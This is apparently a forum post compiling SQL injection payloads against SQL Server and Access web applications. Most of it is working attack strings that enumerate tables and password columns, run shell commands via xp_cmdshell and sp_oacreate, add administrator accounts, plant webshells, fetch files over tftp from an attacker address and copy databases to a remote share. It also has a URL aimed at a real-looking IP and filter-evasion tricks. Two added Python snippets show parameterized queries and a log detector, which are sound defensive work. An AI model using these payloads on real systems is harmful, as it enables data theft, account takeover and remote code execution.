SQL injection summary (strongly recommended)

xiaoxiao, 2021-03-06

SQL injection summary (starting from the classic ' or '1'='1)

The most important table names:

sysobjects, ncsysobjects
sysindexes, tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses

The most important user names (present in a default SQL Server installation):

public
dbo
guest (usually disabled, or without privileges)
db_securityadmin
db_ddladmin

Some default extended stored procedures:

xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia        drives
xp_dirtree               directory tree
xp_enumdsn               ODBC connections
xp_loginconfig           server security mode information
xp_makecab               creates a compressed archive (cabinet)
xp_ntsec_enumdomains     domain information
xp_terminate_process     terminates a process, given its PID

For example:

sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'
exec xp_webserver
sp_dropextendedproc 'xp_webserver'

bcp "select * from test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar

' group by users.id having 1=1--
' group by users.id, users.username, users.password, users.privs having 1=1--
'; insert into users values (666, 'attacker', 'foobar', 0xfff)--

union select top 1 column_name from information_schema.columns where table_name='logintable'--
union select top 1 column_name from information_schema.columns where table_name='logintable' and column_name not in ('login_id')--
union select top 1 column_name from information_schema.columns where table_name='logintable' and column_name not in ('login_id', 'login_name')--
union select top 1 login_name from logintable--
union select top 1 password from logintable where login_name='rahul'--

Constructed statements (checking whether xp_cmdshell exists, and related probes):

' union select @@version, 1, 1, 1--
and 1=(select @@version)
and 'sa'=(select system_user)
' union select ret, 1, 1, 1 from foo--
' union select min(username), 1, 1, 1 from users where username > 'a'--
' union select min(username), 1, 1, 1 from users where username > 'admin'--
' union select password, 1, 1, 1 from users where username='admin'--
and user_name()='dbo'
and 0<>(select user_name())--

declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\winnt\system32\cmd.exe /c net user swap 5245886 /add'

and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell')
; exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype='x'%20and%20name='xp_cmdshell')

and 1=(select is_srvrolemember('sysadmin'))    determines whether the connection has sysadmin (sa) privileges
and 0<>(select top 1 paths from newtable)--    reads back the paths stored in newtable (see below)
and 1=(select name from master.dbo.sysdatabases where dbid=7)    gets a database name (dbid 1 to 5 are the system databases, so start from 6 upward)

Create a virtual directory for the E: drive:

declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', null, 'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "default web site" -v "e","e:\"'

Set its access permissions (to write a webshell):

declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', null, 'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/root/e +browse'

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
Submit dbid=7, 8, 9, ... to get more database names.

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='u')    suppose the result is admin
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='u' and name not in ('admin'))    gets the next table name
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='u' and name='admin' and uid>(str(id)))    the error exposes the id value; suppose it is 18779569 (uid=id)
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569)    gets one column of admin; suppose it is user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in ('id', ...))    gets the other columns
and 0<(select user_id from bbs.dbo.admin where username>1)    yields a username
The password can be obtained the same way. This assumes the columns user_id, username, password and so on exist.

show.asp?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
show.asp?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin

(Union statements are widely used; they also work against Access.)

Database-exposing trick: %5c is '\'; submit the URL with its '/' replaced by %5c.

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='u')    gets a table name
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='u' and name not in ('address'))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='u' and name='admin' and uid>(str(id)))    determines the id value
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=773577794)    all the columns

http://xx.xx.xx.xx/111.asp?id=3400; create table [dbo].[swap] ([swappass] [char](255));
http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 swappass from swap)=1

; create table newtable (id int identity(1,1), paths varchar(500)) declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', @value=@test output insert into newtable (paths) values (@test)

http://61.131.96.39/pageshow.asp?tianname=Policy Regulations&infoid={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master;declare%20@s%20int;exec%20sp_oacreate%20"wscript.shell",@s%20out;exec%20sp_oamethod%20@s,"run",null,"cmd.exe%20/c%20ping%201.1.1.1";

This yields the web path, e.g. d:\xxxx; next:

http://xx.xx.xx.xx/111.asp?id=3400; use ku1;--
http://xx.xx.xx.xx/111.asp?id=3400; create table cmd (str image);

Traditional test for the presence of xp_cmdshell:

; exec master..xp_cmdshell 'dir'

exec master.dbo.sp_addlogin hax;
exec master.dbo.sp_password null, hax, hax;
exec master.dbo.sp_addsrvrolemember hax, sysadmin;
exec master.dbo.xp_cmdshell 'net user hax 5258 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';
; exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';

exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'

http://www.xxx.com/list.asp?classid=1; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\winnt\system32\cmd.exe /c net user swap 5258 /add'
; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\winnt\system32\cmd.exe /c net localgroup administrators swap /add'

http://localhost/show.asp?id=1'; exec master..xp_cmdshell 'tftp -i yourip get file.exe'--

declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'

declare @a sysname; set @a=db_name(); backup database @a to disk='\\yourip\yourshare\bak.dat'

If xp_cmdshell is restricted, this also works:

select * from openrowset('sqloledb', 'server';'sa';'', 'select ''OK!'' exec master.dbo.sp_addlogin hax')

Traditional query construction:

select * from news where id=... and topic=... and ...

admin' and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass<>'

select 123;--
use master;

a' or name like 'fff%';--    shows a user named ffff
' and 1<>(select count(email) ");
; update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='fff';

Explanation:

The statement above fetches the first user table in the database and stores its name in the email field of user ffff.
Viewing the profile of user ffff then reveals the first table, called ad.
Next, get the id of that table:
fff'; update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='fff';
The name of the second table can be obtained the same way:
ffff'; update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='fff';
ffff'; update [users] set email=(select top 1 count(id) from password) where name='fff';
ffff'; update [users] set email=(select top 1 pwd from password where id=2) where name='fff';
ffff'; update [users] set email=(select top 1 name from password where id=2) where name='fff';

exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'

sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'

An extended stored procedure can then be called in the usual way:

exec xp_webserver

Once the extended stored procedure has run, it can be removed like this:

sp_dropextendedproc 'xp_webserver'

insert into users values (666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xfff)--
insert into users values (667, 123, 123, 0xfff)--
insert into users values (123, 'admin''--', 'password', 0xfff)--

and user>0
; and (select count(*) from sysobjects)>0
; and (select count(*) from msysobjects)>0    // for Access databases

----------------------------------------------------------
Some common injection forms:

(A) id=49: the injected parameter is numeric, and the SQL statement is roughly:

select * from tablename where field=49

The injected parameter becomes id=49 and [query condition], so the generated statement is:

select * from tablename where field=49 and [query condition]

(B) class=series: the injected parameter is a string, and the SQL statement is roughly:

select * from tablename where field='series'

The injected parameter becomes class=series' and [query condition] and ''=', so the generated statement is:

select * from tablename where field='series' and [query condition] and ''=''

(C) Search parameters that are not filtered, e.g. keyword=keyword; the SQL statement is roughly:

select * from tablename where field like '%keyword%'

The injected parameter becomes keyword=' and [query condition] and '%25'=', so the generated statement is:

select * from tablename where field like '%' and [query condition] and '%'='%'
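As an added illustration (not part of the original post), the following Python builds the three statement shapes (A), (B) and (C) with sqlite3 standing in for SQL Server: the concatenated form produces exactly the altered statements shown above, while the parameterized form treats the same input as plain data. The news table and its rows are constructed sample data.

```python
import sqlite3

# Constructed sample table standing in for the page's "tablename".
CONN = sqlite3.connect(":memory:")
CONN.execute("CREATE TABLE news (id INTEGER, class TEXT, title TEXT)")
CONN.executemany("INSERT INTO news VALUES (?, ?, ?)",
                 [(49, "series", "ep1"), (50, "movie", "m1"), (51, "series", "ep2")])


def build_concatenated(kind, value):
    """The construction the page describes: the parameter is pasted into the
    statement text, so whatever it contains is parsed as SQL."""
    if kind == "numeric":   # form (A): id=49
        return f"SELECT * FROM news WHERE id = {value}"
    if kind == "string":    # form (B): class=series
        return f"SELECT * FROM news WHERE class = '{value}'"
    if kind == "search":    # form (C): keyword=..., '%25' decodes to '%'
        return f"SELECT * FROM news WHERE title LIKE '%{value}%'"
    raise ValueError(kind)


def run_concatenated(kind, value):
    return CONN.execute(build_concatenated(kind, value)).fetchall()


def run_parameterized(kind, value):
    """Hardened form: the statement text is fixed and the value is bound as a
    parameter, so quotes, 'and' and '%' inside it are data, not SQL. A numeric
    parameter is additionally validated with int(), which rejects '49 or 1=1'."""
    if kind == "numeric":
        return CONN.execute("SELECT * FROM news WHERE id = ?", (int(value),)).fetchall()
    if kind == "string":
        return CONN.execute("SELECT * FROM news WHERE class = ?", (value,)).fetchall()
    if kind == "search":
        return CONN.execute("SELECT * FROM news WHERE title LIKE ?", (f"%{value}%",)).fetchall()
    raise ValueError(kind)
```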

; and (select top 1 name from sysobjects where xtype='u' and status>0)>0

sysobjects is the SQL Server system table that stores all tables, views, constraints and other objects; xtype='u' and status>0 selects the user-created tables. The statement above takes the first table name and compares it with 0; the comparison fails, so the error message exposes the table name.

; and (select top 1 col_name(object_id('tablename'),1) from sysobjects)>0

After obtaining the table name as in 5, object_id('tablename') returns the table's internal id and col_name(id, 1) returns its first column name; changing 1 to 2, 3, 4, ... yields the remaining column names one by one.
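From the defender's side, an added example that is not part of the original post: a small detector that flags the xp_cmdshell tests and the sysobjects/syscolumns/col_name probes listed above in web access logs. It undoes the obfuscations the probes use (percent and double encoding, '+' separators, mixed case, and the 'xp_'+'cmdshell' string-splitting trick). The log format, IPs and paths are constructed placeholders.

```python
import re
from urllib.parse import unquote

# MSSQL metadata and extended-procedure names used by the probes above;
# none of them belongs in a normal web parameter.
INDICATORS = (
    "sysobjects", "syscolumns", "sysdatabases", "information_schema",
    "xp_cmdshell", "sp_oacreate", "sp_oamethod", "sp_addextendedproc",
    "xp_regread", "openrowset", "@@version", "is_srvrolemember",
    "col_name(", "object_id(", "union select",
)

def normalize(query_string):
    """Decode repeatedly (catches double encoding), lowercase, drop the
    'xp_'+'cmdshell' concatenation, and unify '+'/whitespace separators."""
    s = query_string
    for _ in range(3):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"'\s*\+\s*'", "", s.lower())   # 'xp_'+'cmdshell' -> 'xp_cmdshell'
    return re.sub(r"[+\s]+", " ", s)

def flag_request(line):
    """Sorted indicators found in one access-log line; constructed format:
    '<ip> "<METHOD> <path?query> HTTP/1.1" <status>'."""
    m = re.search(r'"[A-Z]+ [^ ?]*\?([^ "]*)', line)
    if not m:
        return []
    q = normalize(m.group(1))
    return sorted(tok for tok in INDICATORS if tok in q)

# Constructed sample lines; the IPs and paths are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 "GET /show.asp?id=1 HTTP/1.1" 200',
    '10.0.0.7 "GET /111.asp?id=3400%20and%201=(select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype=%27x%27%20and%20name=%27xp_cmdshell%27) HTTP/1.1" 500',
    '10.0.0.9 "GET /list.asp?classid=1;declare%20@a%20sysname%20set%20@a=%27xp_%27%2B%27cmdshell%27%20exec%20@a%20%27dir%27 HTTP/1.1" 500',
    '10.0.0.8 "GET /show.asp?id=1;and%20(select%20top%201%20col_name(object_id(%27admin%27),1)%20from%20sysobjects)>0 HTTP/1.1" 500',
    '10.0.0.4 "GET /show.asp?id=-1%20union%20select%201,2,3%20from%20admin HTTP/1.1" 200',
]

def scan(lines=SAMPLE_LOG):
    # (client IP, indicators) for every line that trips at least one
    hits = []
    for line in lines:
        found = flag_request(line)
        if found:
            hits.append((line.split()[0], found))
    return hits
```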

post.htm contents: mainly for convenient input.